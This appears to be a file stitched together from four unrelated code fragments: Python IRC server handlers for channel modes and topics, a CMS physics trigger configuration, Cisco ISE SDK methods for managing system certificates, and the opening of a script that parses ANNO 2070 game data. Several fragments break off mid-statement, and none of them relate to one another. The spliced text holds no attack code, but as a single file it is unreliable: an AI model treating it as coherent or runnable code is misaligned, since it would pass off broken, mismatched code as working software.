def leaveChannel(self, channel, user):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The given user is not connected to the network.")
if channel not in self.ircd.channels:
raise NoSuchChannel ("The given channel does not exist on the network.")
self.ircd.userid[user].leave(self.ircd.channels[channel], self.name)
return {}
LeaveChannel.responder(leaveChannel)
def requestMode(self, user, source, modestring, params):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if user not in self.ircd.userid:
raise NoSuchUser ("The given user is not connected to the network.")
self.ircd.userid[user].setMode(None, modestring, params, source)
return {}
RequestSetMode.responder(requestMode)
def setMode(self, target, targetts, source, modestring, params):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if target in self.ignoreUsers:
return {}
if target in self.ircd.channels:
data = self.ircd.channels[target]
targettype = "channel"
if datetime.utcfromtimestamp(targetts) > data.created:
return {}
elif target in self.ircd.userid:
data = self.ircd.userid[target]
targettype = "user"
else:
raise NoSuchTarget ("The target {} does not exist on the network.".format(target))
adding = True
currentParam = 0
modeDisplay = []
for mode in modestring:
if mode == "+":
adding = True
continue
if mode == "-":
adding = False
continue
if targettype == "channel":
modetype = self.ircd.channel_mode_type[mode]
else:
modetype = self.ircd.user_mode_type[mode]
if modetype == -1 or (modetype == 0 and len(params) > currentParam) or modetype == 1 or (adding and modetype == 2):
param = params[currentParam]
currentParam += 1
else:
param = None
if modetype == -1:
if param not in self.ircd.users:
continue
udata = self.ircd.users[param]
if adding:
status = data.users[udata]
statusList = list(status)
for index, statusLevel in enumerate(status):
if self.ircd.prefixes[statusLevel][1] < self.ircd.prefixes[mode][1]:
statusList.insert(index, mode)
break
if mode not in statusList:
statusList.append(mode)
data.users[udata] = "".join(statusList)
modeDisplay.append([True, mode, param])
else:
if mode in data.users[udata]:
data.users[udata] = data.users[udata].replace(mode, "")
modeDisplay.append([False, mode, param])
elif modetype == 0:
if adding:
if mode not in data.mode:
data.mode[mode] = []
data.mode[mode].append(param)
modeDisplay.append([True, mode, param])
else:
data.mode[mode].remove(param)
modeDisplay.append([False, mode, param])
if not data.mode[mode]:
del data.mode[mode]
else:
if adding:
data.mode[mode] = param
else:
del data.mode[mode]
modeDisplay.append([adding, mode, param])
if modeDisplay:
adding = None
modestr = []
showParams = []
for mode in modeDisplay:
if mode[0] and adding is not True:
adding = True
modestr.append("+")
elif not mode[0] and adding is not False:
adding = False
modestr.append("-")
modestr.append(mode[1])
if mode[2]:
showParams.append(mode[2])
modeLine = "{} {}".format("".join(modestr), " ".join(showParams)) if showParams else "".join(modestr)
if targettype == "user":
data.sendMessage("MODE", modeLine, prefix=source)
else:
for u in data.users:
u.sendMessage("MODE", modeLine, to=data.name, prefix=source)
for server in self.ircd.servers.itervalues():
if server.nearHop == self.ircd.name and server != self:
server.callRemote(SetMode, target=target, targetts=targetts, source=source, modestring="".join(modestr), params=showParams)
return {}
SetMode.responder(setMode)
def setTopic(self, channel, chants, topic, topicsetter, topicts):
if not self.name:
raise HandshakeNotYetComplete ("The initial handshake has not occurred over this link.")
if channel not in self.ircd.channels:
raise NoSuchChannel ("The channel {} does not exist on this network.".format(channel))
cdata = self.ircd.channels[channel]
chantime = datetime.utcfromtimestamp(chants)
if cdata.created < chantime:
return {} # Ignore the change
topictime = datetime.utcfromtimestamp(topicts)
if chantime < cdata.created or topictime > cdata.topicTime or (topictime == cdata.topicTime and not self.localOrigin):
for action in self.ircd.actions["topic"]:
action(cdata, topic, topicsetter)
cdata.topic = topic
cdata.topicSetter = topicsetter
cdata.topicTime = topictime
| |
cms.double(0.9),
NTOT = cms.int32(1),
jetsInput = cms.InputTag("hltAK4PFJets"),
maxCF = cms.double(99.0),
maxEta = cms.double(1e+99),
minPt = cms.double(20.0)
)
process.hltAK4PFJetsTightIDCorrected = cms.EDProducer("CorrectedPFJetProducer",
correctors = cms.VInputTag("hltAK4PFCorrector"),
src = cms.InputTag("hltAK4PFJetsTightID")
)
process.hltAK4PFRelativeCorrector = cms.EDProducer("LXXXCorrectorProducer",
algorithm = cms.string('AK4PFHLT'),
level = cms.string('L2Relative')
)
process.hltAK4PFResidualCorrector = cms.EDProducer("LXXXCorrectorProducer",
algorithm = cms.string('AK4PFHLT'),
level = cms.string('L2L3Residual')
)
process.hltCaloStage2Digis = cms.EDProducer("L1TRawToDigi",
CTP7 = cms.untracked.bool(False),
FWId = cms.uint32(0),
FWOverride = cms.bool(False),
FedIds = cms.vint32(1360, 1366),
InputLabel = cms.InputTag("rawDataCollector"),
MTF7 = cms.untracked.bool(False),
MinFeds = cms.uint32(0),
Setup = cms.string('stage2::CaloSetup'),
debug = cms.untracked.bool(False),
lenAMC13Header = cms.untracked.int32(8),
lenAMC13Trailer = cms.untracked.int32(8),
lenAMCHeader = cms.untracked.int32(8),
lenAMCTrailer = cms.untracked.int32(0),
lenSlinkHeader = cms.untracked.int32(8),
lenSlinkTrailer = cms.untracked.int32(8)
)
process.hltCombinedSecondaryVertexBJetTagsCalo = cms.EDProducer("JetTagProducer",
jetTagComputer = cms.string('hltCombinedSecondaryVertexV2'),
tagInfos = cms.VInputTag("hltImpactParameterTagInfos", "hltInclusiveSecondaryVertexFinderTagInfos")
)
process.hltCsc2DRecHits = cms.EDProducer("CSCRecHitDProducer",
CSCDebug = cms.untracked.bool(False),
CSCNoOfTimeBinsForDynamicPedestal = cms.int32(2),
CSCStripClusterChargeCut = cms.double(25.0),
CSCStripClusterSize = cms.untracked.int32(3),
CSCStripPeakThreshold = cms.double(10.0),
CSCStripxtalksOffset = cms.double(0.03),
CSCUseCalibrations = cms.bool(True),
CSCUseGasGainCorrections = cms.bool(False),
CSCUseStaticPedestals = cms.bool(False),
CSCUseTimingCorrections = cms.bool(True),
CSCWireClusterDeltaT = cms.int32(1),
CSCstripWireDeltaTime = cms.int32(8),
ConstSyst_ME12 = cms.double(0.0),
ConstSyst_ME13 = cms.double(0.0),
ConstSyst_ME1a = cms.double(0.022),
ConstSyst_ME1b = cms.double(0.007),
ConstSyst_ME21 = cms.double(0.0),
ConstSyst_ME22 = cms.double(0.0),
ConstSyst_ME31 = cms.double(0.0),
ConstSyst_ME32 = cms.double(0.0),
ConstSyst_ME41 = cms.double(0.0),
NoiseLevel_ME12 = cms.double(9.0),
NoiseLevel_ME13 = cms.double(8.0),
NoiseLevel_ME1a = cms.double(7.0),
NoiseLevel_ME1b = cms.double(8.0),
NoiseLevel_ME21 = cms.double(9.0),
NoiseLevel_ME22 = cms.double(9.0),
NoiseLevel_ME31 = cms.double(9.0),
NoiseLevel_ME32 = cms.double(9.0),
NoiseLevel_ME41 = cms.double(9.0),
UseAverageTime = cms.bool(False),
UseFivePoleFit = cms.bool(True),
UseParabolaFit = cms.bool(False),
XTasymmetry_ME12 = cms.double(0.0),
XTasymmetry_ME13 = cms.double(0.0),
XTasymmetry_ME1a = cms.double(0.0),
XTasymmetry_ME1b = cms.double(0.0),
XTasymmetry_ME21 = cms.double(0.0),
XTasymmetry_ME22 = cms.double(0.0),
XTasymmetry_ME31 = cms.double(0.0),
XTasymmetry_ME32 = cms.double(0.0),
XTasymmetry_ME41 = cms.double(0.0),
readBadChambers = cms.bool(True),
readBadChannels = cms.bool(False),
stripDigiTag = cms.InputTag("hltMuonCSCDigis","MuonCSCStripDigi"),
wireDigiTag = cms.InputTag("hltMuonCSCDigis","MuonCSCWireDigi")
)
process.hltCscSegments = cms.EDProducer("CSCSegmentProducer",
algo_psets = cms.VPSet(cms.PSet(
algo_name = cms.string('CSCSegAlgoST'),
algo_psets = cms.VPSet(cms.PSet(
BPMinImprovement = cms.double(10000.0),
BrutePruning = cms.bool(True),
CSCDebug = cms.untracked.bool(False),
CorrectTheErrors = cms.bool(True),
Covariance = cms.double(0.0),
ForceCovariance = cms.bool(False),
ForceCovarianceAll = cms.bool(False),
NormChi2Cut2D = cms.double(20.0),
NormChi2Cut3D = cms.double(10.0),
Pruning = cms.bool(True),
SeedBig = cms.double(0.0015),
SeedSmall = cms.double(0.0002),
curvePenalty = cms.double(2.0),
curvePenaltyThreshold = cms.double(0.85),
dPhiFineMax = cms.double(0.025),
dRPhiFineMax = cms.double(8.0),
dXclusBoxMax = cms.double(4.0),
dYclusBoxMax = cms.double(8.0),
hitDropLimit4Hits = cms.double(0.6),
hitDropLimit5Hits = cms.double(0.8),
hitDropLimit6Hits = cms.double(0.3333),
maxDPhi = cms.double(999.0),
maxDTheta = cms.double(999.0),
maxRatioResidualPrune = cms.double(3.0),
maxRecHitsInCluster = cms.int32(20),
minHitsPerSegment = cms.int32(3),
onlyBestSegment = cms.bool(False),
preClustering = cms.bool(True),
preClusteringUseChaining = cms.bool(True),
prePrun = cms.bool(True),
prePrunLimit = cms.double(3.17),
tanPhiMax = cms.double(0.5),
tanThetaMax = cms.double(1.2),
useShowering = cms.bool(False),
yweightPenalty = cms.double(1.5),
yweightPenaltyThreshold = cms.double(1.0)
),
cms.PSet(
BPMinImprovement = cms.double(10000.0),
BrutePruning = cms.bool(True),
CSCDebug = cms.untracked.bool(False),
CorrectTheErrors = cms.bool(True),
Covariance = cms.double(0.0),
ForceCovariance = cms.bool(False),
ForceCovarianceAll = cms.bool(False),
NormChi2Cut2D = cms.double(20.0),
NormChi2Cut3D = cms.double(10.0),
Pruning = cms.bool(True),
SeedBig = cms.double(0.0015),
SeedSmall = cms.double(0.0002),
curvePenalty = cms.double(2.0),
curvePenaltyThreshold = cms.double(0.85),
dPhiFineMax = cms.double(0.025),
dRPhiFineMax = cms.double(8.0),
dXclusBoxMax = cms.double(4.0),
dYclusBoxMax = cms.double(8.0),
hitDropLimit4Hits = cms.double(0.6),
hitDropLimit5Hits = cms.double(0.8),
hitDropLimit6Hits = cms.double(0.3333),
maxDPhi = cms.double(999.0),
maxDTheta = cms.double(999.0),
maxRatioResidualPrune = cms.double(3.0),
maxRecHitsInCluster = cms.int32(24),
minHitsPerSegment = cms.int32(3),
onlyBestSegment = cms.bool(False),
preClustering = cms.bool(True),
preClusteringUseChaining = cms.bool(True),
prePrun = cms.bool(True),
prePrunLimit = cms.double(3.17),
tanPhiMax = cms.double(0.5),
tanThetaMax = cms.double(1.2),
useShowering = cms.bool(False),
yweightPenalty = cms.double(1.5),
yweightPenaltyThreshold = cms.double(1.0)
)),
chamber_types = cms.vstring('ME1/a',
'ME1/b',
'ME1/2',
'ME1/3',
'ME2/1',
'ME2/2',
'ME3/1',
'ME3/2',
'ME4/1',
'ME4/2'),
parameters_per_chamber_type = cms.vint32(2, 1, 1, 1, 1,
1, 1, 1, 1, 1)
)),
algo_type = cms.int32(1),
inputObjects = cms.InputTag("hltCsc2DRecHits")
)
process.hltDt1DRecHits = cms.EDProducer("DTRecHitProducer",
debug = cms.untracked.bool(False),
dtDigiLabel = cms.InputTag("hltMuonDTDigis"),
recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
recAlgoConfig = cms.PSet(
debug = cms.untracked.bool(False),
doVdriftCorr = cms.bool(True),
maxTime = cms.double(420.0),
minTime = cms.double(-3.0),
stepTwoFromDigi = cms.bool(False),
tTrigMode = cms.string('DTTTrigSyncFromDB'),
tTrigModeConfig = cms.PSet(
debug = cms.untracked.bool(False),
doT0Correction = cms.bool(True),
doTOFCorrection = cms.bool(True),
doWirePropCorrection = cms.bool(True),
tTrigLabel = cms.string(''),
tofCorrType = cms.int32(0),
vPropWire = cms.double(24.4),
wirePropCorrType = cms.int32(0)
),
useUncertDB = cms.bool(True)
)
)
process.hltDt4DSegments = cms.EDProducer("DTRecSegment4DProducer",
Reco4DAlgoConfig = cms.PSet(
AllDTRecHits = cms.bool(True),
Reco2DAlgoConfig = cms.PSet(
AlphaMaxPhi = cms.double(1.0),
AlphaMaxTheta = cms.double(0.9),
MaxAllowedHits = cms.uint32(50),
debug = cms.untracked.bool(False),
hit_afterT0_resolution = cms.double(0.03),
nSharedHitsMax = cms.int32(2),
nUnSharedHitsMin = cms.int32(2),
performT0SegCorrection = cms.bool(False),
performT0_vdriftSegCorrection = cms.bool(False),
perform_delta_rejecting = cms.bool(False),
recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
recAlgoConfig = cms.PSet(
debug = cms.untracked.bool(False),
doVdriftCorr = cms.bool(True),
maxTime = cms.double(420.0),
minTime = cms.double(-3.0),
stepTwoFromDigi = cms.bool(False),
tTrigMode = cms.string('DTTTrigSyncFromDB'),
tTrigModeConfig = cms.PSet(
debug = cms.untracked.bool(False),
doT0Correction = cms.bool(True),
doTOFCorrection = cms.bool(True),
doWirePropCorrection = cms.bool(True),
tTrigLabel = cms.string(''),
tofCorrType = cms.int32(0),
vPropWire = cms.double(24.4),
wirePropCorrType = cms.int32(0)
),
useUncertDB = cms.bool(True)
),
segmCleanerMode = cms.int32(2)
),
Reco2DAlgoName = cms.string('DTCombinatorialPatternReco'),
debug = cms.untracked.bool(False),
hit_afterT0_resolution = cms.double(0.03),
nSharedHitsMax = cms.int32(2),
nUnSharedHitsMin = cms.int32(2),
performT0SegCorrection = cms.bool(False),
performT0_vdriftSegCorrection = cms.bool(False),
perform_delta_rejecting = cms.bool(False),
recAlgo = cms.string('DTLinearDriftFromDBAlgo'),
recAlgoConfig = cms.PSet(
debug = cms.untracked.bool(False),
doVdriftCorr = cms.bool(True),
maxTime = cms.double(420.0),
minTime = cms.double(-3.0),
stepTwoFromDigi = cms.bool(False),
tTrigMode = cms.string('DTTTrigSyncFromDB'),
tTrigModeConfig = cms.PSet(
debug = cms.untracked.bool(False),
doT0Correction = cms.bool(True),
doTOFCorrection = cms.bool(True),
doWirePropCorrection = cms.bool(True),
tTrigLabel = cms.string(''),
tofCorrType = cms.int32(0),
vPropWire = cms.double(24.4),
wirePropCorrType = cms.int32(0)
),
useUncertDB = cms.bool(True)
),
segmCleanerMode = cms.int32(2)
),
Reco4DAlgoName = cms.string('DTCombinatorialPatternReco4D'),
debug = cms.untracked.bool(False),
recHits1DLabel = cms.InputTag("hltDt1DRecHits"),
recHits2DLabel = cms.InputTag("dt2DSegments")
)
process.hltEcalDetIdToBeRecovered = cms.EDProducer("EcalDetIdToBeRecoveredProducer",
ebDetIdToBeRecovered = cms.string('ebDetId'),
ebFEToBeRecovered = cms.string('ebFE'),
ebIntegrityChIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityChIdErrors"),
ebIntegrityGainErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainErrors"),
ebIntegrityGainSwitchErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainSwitchErrors"),
ebSrFlagCollection = cms.InputTag("hltEcalDigis"),
eeDetIdToBeRecovered = cms.string('eeDetId'),
eeFEToBeRecovered = cms.string('eeFE'),
eeIntegrityChIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityChIdErrors"),
eeIntegrityGainErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainErrors"),
eeIntegrityGainSwitchErrors = cms.InputTag("hltEcalDigis","EcalIntegrityGainSwitchErrors"),
eeSrFlagCollection = cms.InputTag("hltEcalDigis"),
integrityBlockSizeErrors = cms.InputTag("hltEcalDigis","EcalIntegrityBlockSizeErrors"),
integrityTTIdErrors = cms.InputTag("hltEcalDigis","EcalIntegrityTTIdErrors")
)
process.hltEcalDigis = cms.EDProducer("EcalRawToDigi",
DoRegional = cms.bool(False),
FEDs = cms.vint32(601, 602, 603, 604, 605,
606, 607, 608, 609, 610,
611, 612, 613, 614, 615,
616, 617, 618, 619, 620,
621, 622, 623, 624, 625,
626, 627, 628, 629, 630,
631, 632, 633, 634, 635,
636, 637, 638, 639, 640,
641, 642, 643, 644, 645,
646, 647, 648, 649, 650,
651, 652, 653, 654),
FedLabel = cms.InputTag("listfeds"),
InputLabel = cms.InputTag("rawDataCollector"),
eventPut = cms.bool(True),
feIdCheck = cms.bool(True),
feUnpacking = cms.bool(True),
forceToKeepFRData = cms.bool(False),
headerUnpacking = cms.bool(True),
memUnpacking = cms.bool(True),
numbTriggerTSamples = cms.int32(1),
numbXtalTSamples = cms.int32(10),
orderedDCCIdList = cms.vint32(1, 2, 3, 4, 5,
6, 7, 8, 9, 10,
11, 12, 13, 14, 15,
16, 17, 18, 19, 20,
21, 22, 23, 24, 25,
26, 27, 28, 29, 30,
31, 32, 33, 34, 35,
36, 37, 38, 39, 40,
41, 42, 43, 44, 45,
46, 47, 48, 49, 50,
51, 52, 53, 54),
orderedFedList = cms.vint32(601, 602, 603, 604, 605,
606, 607, 608, 609, 610,
611, 612, 613, 614, 615,
616, 617, 618, 619, 620,
621, 622, 623, 624, 625,
626, 627, 628, 629, 630,
631, 632, 633, 634, 635,
636, 637, 638, 639, 640,
641, 642, 643, 644, 645,
646, 647, 648, 649, 650,
651, 652, 653, 654),
silentMode = cms.untracked.bool(True),
srpUnpacking = cms.bool(True),
syncCheck = cms.bool(True),
tccUnpacking = cms.bool(True)
)
process.hltEcalPreshowerDigis = cms.EDProducer("ESRawToDigi",
ESdigiCollection = cms.string(''),
InstanceES = cms.string(''),
LookupTable = cms.FileInPath('EventFilter/ESDigiToRaw/data/ES_lookup_table.dat'),
debugMode = cms.untracked.bool(False),
sourceTag = cms.InputTag("rawDataCollector")
)
process.hltEcalPreshowerRecHit = cms.EDProducer("ESRecHitProducer",
ESRecoAlgo = cms.int32(0),
ESdigiCollection = cms.InputTag("hltEcalPreshowerDigis"),
ESrechitCollection = cms.string('EcalRecHitsES'),
algo = cms.string('ESRecHitWorker')
)
process.hltEcalRecHit = cms.EDProducer("EcalRecHitProducer",
ChannelStatusToBeExcluded = cms.vstring(),
EBLaserMAX = cms.double(3.0),
EBLaserMIN = cms.double(0.5),
EBrechitCollection = cms.string('EcalRecHitsEB'),
EBuncalibRecHitCollection = cms.InputTag("hltEcalUncalibRecHit","EcalUncalibRecHitsEB"),
EELaserMAX = cms.double(8.0),
EELaserMIN = cms.double(0.5),
EErechitCollection = cms.string('EcalRecHitsEE'),
EEuncalibRecHitCollection = cms.InputTag("hltEcalUncalibRecHit","EcalUncalibRecHitsEE"),
algo = cms.string('EcalRecHitWorkerSimple'),
algoRecover = cms.string('EcalRecHitWorkerRecover'),
cleaningConfig = cms.PSet(
cThreshold_barrel = cms.double(4.0),
cThreshold_double = cms.double(10.0),
cThreshold_endcap = cms.double(15.0),
e4e1Threshold_barrel = cms.double(0.08),
e4e1Threshold_endcap = cms.double(0.3),
e4e1_a_barrel = cms.double(0.04),
e4e1_a_endcap = cms.double(0.02),
e4e1_b_barrel = cms.double(-0.024),
e4e1_b_endcap = cms.double(-0.0125),
e6e2thresh = cms.double(0.04),
ignoreOutOfTimeThresh = cms.double(1000000000.0),
tightenCrack_e1_double = cms.double(2.0),
tightenCrack_e1_single = cms.double(2.0),
tightenCrack_e4e1_single = cms.double(3.0),
tightenCrack_e6e2_double = cms.double(3.0)
),
dbStatusToBeExcludedEB = cms.vint32(14, 78, 142),
dbStatusToBeExcludedEE = cms.vint32(14, 78, 142),
ebDetIdToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","ebDetId"),
ebFEToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","ebFE"),
eeDetIdToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","eeDetId"),
eeFEToBeRecovered = cms.InputTag("hltEcalDetIdToBeRecovered","eeFE"),
flagsMapDBReco = cms.PSet(
kDead = cms.vstring('kNoDataNoTP'),
kGood = cms.vstring('kOk',
'kDAC',
'kNoLaser',
'kNoisy'),
kNeighboursRecovered = cms.vstring('kFixedG0',
'kNonRespondingIsolated',
'kDeadVFE'),
kNoisy = cms.vstring('kNNoisy',
'kFixedG6',
'kFixedG1'),
kTowerRecovered = cms.vstring('kDeadFE')
),
killDeadChannels = cms.bool(True),
laserCorrection = cms.bool(True),
logWarningEtThreshold_EB_FE = cms.double(50.0),
logWarningEtThreshold_EE_FE = cms.double(50.0),
recoverEBFE = cms.bool(True),
recoverEBIsolatedChannels = cms.bool(False),
recoverEBVFE = cms.bool(False),
recoverEEFE = cms.bool(True),
recoverEEIsolatedChannels = cms.bool(False),
recoverEEVFE = cms.bool(False),
singleChannelRecoveryMethod = cms.string('NeuralNetworks'),
singleChannelRecoveryThreshold = cms.double(8.0),
triggerPrimitiveDigiCollection = cms.InputTag("hltEcalDigis","EcalTriggerPrimitives")
)
process.hltEcalUncalibRecHit = cms.EDProducer("EcalUncalibRecHitProducer",
EBdigiCollection = cms.InputTag("hltEcalDigis","ebDigis"),
EBhitCollection = cms.string('EcalUncalibRecHitsEB'),
EEdigiCollection = cms.InputTag("hltEcalDigis","eeDigis"),
EEhitCollection | |
and Sorting supported on below mentioned
attributes: friendlyName issuedTo issuedBy
validFrom Supported Date Format: yyyy-MM-dd HH:mm:ss
Supported Operators: EQ, NEQ, GT and LT
expirationDate Supported Date Format: yyyy-MM-dd
HH:mm:ss Supported Operators: EQ, NEQ, GT and LT
.
Args:
host_name(basestring): hostName path parameter. Name of
the host of which system certificates
should be returned.
page(int): page query parameter. Page number.
size(int): size query parameter. Number of objects
returned per page.
sort(basestring): sort query parameter. sort type - asc
or desc.
sort_by(basestring): sortBy query parameter. sort column
by which objects needs to be sorted.
filter(basestring, list, set, tuple): filter query
parameter. **Simple
filtering** should be available through
the filter query string parameter. The
structure of a filter is a triplet of
field operator and value separated with
dots. More than one filter can be sent.
The logical operator common to ALL
filter criteria will be by default AND,
and can be changed by using the
"filterType=or" query string parameter.
Each resource Data model description
should specify if an attribute is a
filtered field. (Operator:
Description),
(EQ: Equals), (NEQ: Not
Equals), (GT: Greater
Than), (LT: Less Then),
(STARTSW: Starts With),
(NSTARTSW: Not Starts With),
(ENDSW: Ends With),
(NENDSW: Not Ends With),
(CONTAINS: Contains),
(NCONTAINS: Not Contains),
.
filter_type(basestring): filterType query parameter. The
logical operator common to ALL filter
criteria will be by default AND, and can
be changed by using the parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
pass
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(page, (int, basestring, list))
check_type(size, (int, basestring, list))
check_type(sort, basestring)
check_type(sort_by, basestring)
check_type(filter, (basestring, list, set, tuple))
check_type(filter_type, basestring)
check_type(host_name, basestring,
may_be_none=False)
_params = {
'page':
page,
'size':
size,
'sort':
sort,
'sortBy':
sort_by,
'filter':
filter,
'filterType':
filter_type,
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'hostName': host_name,
}
e_url = ('/api/v1/certs/system-certificate/{hostName}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a56f5c5f739a83e8806da16be5_v3_0_0', _api_response)
def get_all_system_certificates_generator(self,
host_name,
filter=None,
filter_type=None,
page=None,
size=None,
sort=None,
sort_by=None,
headers=None,
**query_parameters):
""" This API supports Filtering, Sorting and Pagination.
Filtering and Sorting supported on below mentioned
attributes: friendlyName issuedTo issuedBy
validFrom Supported Date Format: yyyy-MM-dd HH:mm:ss
Supported Operators: EQ, NEQ, GT and LT
expirationDate Supported Date Format: yyyy-MM-dd
HH:mm:ss Supported Operators: EQ, NEQ, GT and LT
.
Args:
host_name(basestring): hostName path parameter. Name of
the host of which system certificates
should be returned.
page(int): page query parameter. Page number.
size(int): size query parameter. Number of objects
returned per page.
sort(basestring): sort query parameter. sort type - asc
or desc.
sort_by(basestring): sortBy query parameter. sort column
by which objects needs to be sorted.
filter(basestring, list, set, tuple): filter query
parameter. **Simple
filtering** should be available through
the filter query string parameter. The
structure of a filter is a triplet of
field operator and value separated with
dots. More than one filter can be sent.
The logical operator common to ALL
filter criteria will be by default AND,
and can be changed by using the
"filterType=or" query string parameter.
Each resource Data model description
should specify if an attribute is a
filtered field. (Operator:
Description),
(EQ: Equals), (NEQ: Not
Equals), (GT: Greater
Than), (LT: Less Then),
(STARTSW: Starts With),
(NSTARTSW: Not Starts With),
(ENDSW: Ends With),
(NENDSW: Not Ends With),
(CONTAINS: Contains),
(NCONTAINS: Not Contains),
.
filter_type(basestring): filterType query parameter. The
logical operator common to ALL filter
criteria will be by default AND, and can
be changed by using the parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
Generator: A generator object containing the following object.
+ RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
yield from get_next_page(self.get_all_system_certificates, dict(
host_name=host_name,
filter=filter,
filter_type=filter_type,
page=page,
size=size,
sort=sort,
sort_by=sort_by,
**query_parameters
), access_next_list=["nextPage", "href"])
def get_system_certificate_by_id(self,
host_name,
id,
headers=None,
**query_parameters):
"""Purpose of this API is to get system certificate of a particular
node by Id.
Args:
host_name(basestring): hostName path parameter. Name of
the host of which system certificates
should be returned.
id(basestring): id path parameter. The id of the system
certificate.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
pass
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(host_name, basestring,
may_be_none=False)
check_type(id, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'hostName': host_name,
'id': id,
}
e_url = ('/api/v1/certs/system-certificate/{hostName}/{id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_f36e90115b05416a71506061fed7e5c_v3_0_0', _api_response)
def delete_system_certificate_by_id(self,
host_name,
id,
headers=None,
**query_parameters):
"""Purpose of the API is to delete System Certificate by ID and
hostname.
Args:
host_name(basestring): hostName path parameter. Name of
the host from which the System
Certificate needs to be deleted.
id(basestring): id path parameter. The ID of the System
Certificate to be deleted.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
pass
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(host_name, basestring,
may_be_none=False)
check_type(id, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'hostName': host_name,
'id': id,
}
e_url = ('/api/v1/certs/system-certificate/{hostName}/{id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_dc2eec65ad680a3c5de47cd87c8_v3_0_0', _api_response)
def update_system_certificate(self,
host_name,
id,
admin=None,
allow_replacement_of_portal_group_tag=None,
description=None,
eap=None,
expiration_ttl_period=None,
expiration_ttl_units=None,
ims=None,
name=None,
portal=None,
portal_group_tag=None,
pxgrid=None,
radius=None,
renew_self_signed_certificate=None,
saml=None,
headers=None,
payload=None,
active_validation=True,
**query_parameters):
"""Purpose of the API is to update data for existing system
certificate.
Args:
admin(boolean): Use certificate to authenticate the ISE
Admin Portal, property of the request
body.
allow_replacement_of_portal_group_tag(boolean): Allow
Replacement of Portal Group Tag
(required), property of the request
| |
'''
Created on 13.12.2011
@author: <EMAIL>
'''
from __future__ import division
import json, re #, sys
from xml.etree import ElementTree as ET
__version__ = "0.3"
# global settings
# txt files must be changed encoding from UCS-2 to ANSI :(( xml files are ok )
folder = "C:\\Users\\Peter\\Documents\\ANNO 2070\\"
assets_path = folder + "patch3data\\config\\game\\assets.xml"
icons_txt_path = folder + "eng1\\loca\\eng\\txt\\icons.txt"
guids_txt_path = folder + "eng1\\loca\\eng\\txt\\guids.txt"
properties_path = folder + "patch3data\\config\\game\\properties.xml"
icons_path = folder + "patch3data\\config\\game\\icons.xml"
IconWikiaFilessource_path = folder + "wikia_icons_source.txt"
IconWikiaFiles_path = folder + "wikia_icons_map.csv"
output_name = "list_of_buildings_v" + __version__ + ".json"
model_name = "list_of_buildings_model_v" + __version__ + ".json"
